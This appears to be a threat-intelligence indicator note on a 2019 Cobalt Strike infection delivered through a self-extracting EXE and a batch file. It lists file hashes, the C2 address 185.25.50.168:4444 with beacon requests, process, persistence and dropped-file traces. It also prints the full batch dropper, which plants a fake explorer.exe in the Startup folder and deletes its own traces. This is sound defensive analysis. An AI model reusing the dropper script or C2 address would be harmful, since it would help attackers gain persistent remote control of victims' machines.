#cobaltstrike_210319

1. #IOC #OptiData #VR #cobaltstrike #SFX #BAT
2.  
3. https://pastebin.com/hbxkBA9n
4.  
5. FAQ:
6. https://www.cobaltstrike.com/features
7. https://www.youtube.com/watch?v=rqOG_oyYbvs
8. https://pypi.org/project/pyconfig/
9. https://blog.cobaltstrike.com/2014/06/12/cobalt-strike-innovative-offense-or-just-a-gui/
10.  
11. attack_vector
12. --------------
13. EXE (SFX) > .bat > Startup\explorer.exe
14.  
15. email_headers
16. --------------
17. n/a
18.  
19. files
20. --------------
21. SHA-256 fb7f4162ee59ee2b23606bb50c560a8010df95d3746c79b13f8200de05e934ad
22. File name explorer.exe
23. File size 4.58 MB (4797547 bytes)
24.  
25. SHA-256 1acb5b19209c8b11aceb40b5d5da4a53505f1180bd0e0ea1886c8b8159af35b1
26. File name Nd9q
27. File size 205.09 KB (210011 bytes)
28.  
29. SHA-256 2f16567c59e964e2eb583a1aa749a08255db10685b087b2dffc154d165f4f4e9
30. File name pyconfig.h
31. File size 21.31 KB (21821 bytes)
32.  
33. SHA-256 ce559f72bf1fc7b72f3db4b814320d3902f607098c06141901277a07976b59f7
34. File name python34.dll
35. File size 2.62 MB (2744832 bytes)
36.  
37. activity
38. **************
39.  
40. bat_file
41. --------------
42. @echo off
43. copy explorer.exe "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup"
44. cd "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\"
45. start explorer.exe
46. cd %~dp0
47. del 1.rar.exe
48. del explorer.exe
49. del link_site.bat
50. exit
51.  
52. C2:
53. http://185.25.50.168:4444/Nd9q
54.  
55. netwrk
56. --------------
57. 185.25.50.168 185.25.50.168:4444 GET /Nd9q HTTP/1.1 Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1;)
58. 185.25.50.168 185.25.50.168:4444 GET /cx HTTP/1.1 Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1;)
59. 185.25.50.168 185.25.50.168:4444 GET /cx HTTP/1.1 Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1;)
60.  
61. comp
62. --------------
63. explorer.exe 1236 TCP localhost 50093 185.25.50.168 4444 CLOSE_WAIT
64.  
65. proc
66. --------------
67. C:\Windows\system32\cmd.exe cmd /c ""C:\Users\operator\Desktop\1\link_site.bat" "
68. C:\Users\operator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\explorer.exe
69. C:\Users\operator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\explorer.exe
70.  
71. persist
72. --------------
73. C:\Users\operator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup 19.03.2019 15:59
74. explorer.exe
75. c:\users\operator\appdata\roaming\microsoft\windows\start menu\programs\startup\explorer.exe 01.01.1970 2:00
76.  
77. drop
78. --------------
79. C:\Users\operator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\explorer.exe
80.  
81. %temp%\_MEI22402\Include\pyconfig.h
82. %temp%\_MEI22402\python34.dll
83. %temp%\_MEI22402\MSVCR100.dll
84. %temp%\_MEI22402\_ssl.pyd
85. %temp%\_MEI22402\_socket.pyd
86. %temp%\_MEI22402\unicodedata.pyd
87. %temp%\_MEI22402\unicodedata.pyd
88. %temp%\_MEI22402\...
89.  
90. # # #
91.  
92. VR